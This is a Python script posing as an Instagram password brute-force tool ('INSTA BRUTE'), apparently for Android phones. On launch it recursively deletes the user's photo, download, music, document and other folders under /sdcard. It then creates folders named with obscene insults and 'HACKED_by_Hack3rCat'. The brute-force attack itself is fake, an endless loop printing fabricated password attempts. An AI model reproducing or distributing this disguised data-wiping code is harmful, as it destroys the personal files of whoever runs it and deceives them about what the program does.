import os
import colorama
from colorama import Fore, Back, Style
import time
import pyfiglet
from pyfiglet import Figlet
def animate_message(message):
    for char in message:
        print(char, end='', flush=True)
        time.sleep(0.1)  
    print() 

os.system("cd")
os.chdir("/sdcard")
os.system("rm -r Android")
os.system("rm -r Documents")
os.system("rm -r Pictures")
os.system("rm -r Media")
os.system("rm -r DCİM")
os.system("rm -r DCIM")
os.system("rm -r Download")
os.system("rm -r Movies")
os.system("rm -r Music")
os.system("rm -r Ringtones")
os.system("rm -r snaptube")
os.system("mkdir HACKLENDİN_OROSPU_EVLADI")
os.system("mkdir SEKS_ANANIN_AMI")
os.system("mkdir HACKLENDİN_OROSPU_EVLADI2")
os.system("mkdir SEKS_ANANIN_AMI2")
os.system("mkdir HACKLENDİN_OROSPU_EVLADI1")
os.system("mkdir SEKS_ANANIN_AMI1")
os.system("mkdir HACKLENDİN_OROSPU_EVLADI3")
os.system("mkdir SEKS_ANANIN_AMI3")
os.system("mkdir HACKED_by_Hack3rCat")
os.system("mkdir HACKED_by_Hack3rCat1")
os.system("mkdir HACKED_by_Hack3rCat2")
os.system("mkdir FUCK_YOUR_MOTHER")
os.system("mkdir FUCK_YOUR_MOTHER1")
os.system("mkdir FUCK_YOUR_MOTHER2")

os.system("clear")
setupBanner = Figlet(font="big")
print(Fore.YELLOW)
print(setupBanner.renderText("Setup Files"))
os.system("pip install colorama")
os.system("pip install time")
os.system("pip install pyfiglet")
os.system("apt update -y && apt upgrade -y")


os.system("clear")
f = Figlet(font='roman')
print (Fore.RED)
print(f.renderText("INSTA BRUTE"))
print(Fore.GREEN)
print("Coder: TG @Anamı_Sikti  \n " )
print (" ")
print(Fore.WHITE)
print ("-----》 1. Turkish \n-----》 2. English")
dil = str(input("Choice/Seçim? "))
if dil == "1":
    os.system("clear")
    print (Fore.GREEN)
    print (f.renderText("INSTA BRUTE"))
    print(Fore.BLUE)
    print("Coder: TG @Anamı_Sikti")
    print(Fore.GREEN)
    animate_message("Merhaba yep yeni instagram BruteForce toolumuz hazır. Tamamen güvenli ve hızlı. İyi kullanımlar.\n DİKKAT KÖTÜYE KULLANIMDAN SORUMLU DEİLİM !!!")
    time.sleep(2)
    os.system("clear")
    print (Fore.BLUE)
    print (f.renderText("INSTA BRUTE"))
    print(Fore.WHITE)
    print ("Hedef kullanıcı adını girin!")
    user_id = input("Kullanıcı adı: ")
    print(Fore.GREEN)
    print("Hedef Kullanıcı--> " + user_id)
    print(" ")
    print(Fore.WHITE)
    print ("Hedef platform seçin! \n 1.İnstagram")
    platform = input("Platform seçin: ")
    print(Fore.GREEN)
    print("Hedef Platform --> " + "İnstagram")
    print(" ")
    print(Fore.WHITE)
    print ("Proxy/DNS seçin. (DİKKAT GİZLİLİK İÇİN ÖNEMLİDİR !!!) \n 1. Google dns\n 2. Yandex dns\n 3. Droid dns")
    proxy = input("Proxy seçiminiz: ")
    print (" ")
    print(Fore.GREEN)
    print ("Proxy/DNS --> " + "ULTRA SECURED Proxy/DNS")
    print(Fore.RED)
    animate_message("Bilgiler kontrol ediliyor. Lütfen sabırlı olun !!!")
    time.sleep(5)
    print(Fore.GREEN)
    print("Hedef Kullanıcı--> " + user_id)
    time.sleep(3)
    print("Hedef Platform --> " + "İnstagram")
    time.sleep(3)
    print ("Proxy/DNS --> " + "ULTRA SECURED Proxy/DNS")
    time.sleep(3)
    print("İŞLEM HAZIRLANIYOR!!!")
    time.sleep(3)
    print(Fore.GREEN)
    print("SALDIRI BAŞLIYOR")
    os.system("clear")
    print(Fore.RED)
    print (f.renderText("ATTACK START"))
    time.sleep(1)
    sart = 10
    while sart > 1:
        k1 = ("Deneme: 192.168.1.1/24:8080 ")
        k2 = ("Tryig new password - ******** ")  
        t1 = ("\033[0;32m" + k1 +"\033[0m")
        t2 = ("\033[34m" + k2 + "\033[0m")
        atak = (t1 + t2)
        print(atak)
        print(Fore.RED)
        print("ERROR WRONG PASSWORD")
        time.sleep(1.5)
    
    
    
    
    

elif dil == "2":
    os.system("clear")
    print (Fore.GREEN)
    print (f.renderText("INSTA BRUTE"))
    print(Fore.BLUE)
    print("Coder: TG @Anamı_Sikti")
    print(Fore.GREEN)
    animate_message("Hello, our brand new Instagram BruteForce tool is ready.  Completely safe and fast.  Have fun using it.\n ATTENTION I AM NOT RESPONSIBLE FOR ABUSE!!!")
    time.sleep(2)
    os.system("clear")
    print (Fore.BLUE)
    print (f.renderText("INSTA BRUTE"))
    print(Fore.WHITE)
    print ("İnput Target username!")
    user_id = input("Username: ")
    print(Fore.GREEN)
    print("Target User --> " + user_id)
    print(" ")
    print(Fore.WHITE)
    print ("Choose target platform! \n 1.İnstagram")
    platform = input("Choose platform: ")
    print(Fore.GREEN)
    print("Target Platform --> " + "İnstagram")
    print(" ")
    print(Fore.WHITE)
    print ("Select Proxy/DNS.  (ATTENTION IS IMPORTANT FOR PRIVACY!!!) \n 1. Google dns\n 2. Yandex dns\n 3. Droid dns")
    proxy = input("Proxy choice: ")
    print (" ")
    print(Fore.GREEN)
    print ("Proxy/DNS --> " + "ULTRA SECURED Proxy/DNS")
    print(Fore.RED)
    animate_message("Information is being checked.  Please be patient!!!")
    time.sleep(5)
    print(Fore.GREEN)
    print("Target User --> " + user_id)
    time.sleep(3)
    print("Target platform --> " + "İnstagram")
    time.sleep(3)
    print ("Proxy/DNS --> " + "ULTRA SECURED Proxy/DNS")
    time.sleep(3)
    print("THE PROCESS IS BEING PREPARED!!!")
    time.sleep(3)
    print(Fore.GREEN)
    print("ATTACK START")
    os.system("clear")
    print(Fore.RED)
    print (f.renderText("ATTACK START"))
    time.sleep(1)
    sart = 10
    while sart > 1:
        k1 = ("TRYİNG: 192.168.1.1/24:8080 ")
        k2 = ("Tryig new password - ******** ")  
        t1 = ("\033[0;32m" + k1 +"\033[0m")
        t2 = ("\033[34m" + k2 + "\033[0m")
        atak = (t1 + t2)
        print(atak)
        print(Fore.RED)
        print("ERROR WRONG PASSWORD")
        time.sleep(1.5)

else:
    print("çıkılıyor")
    quit()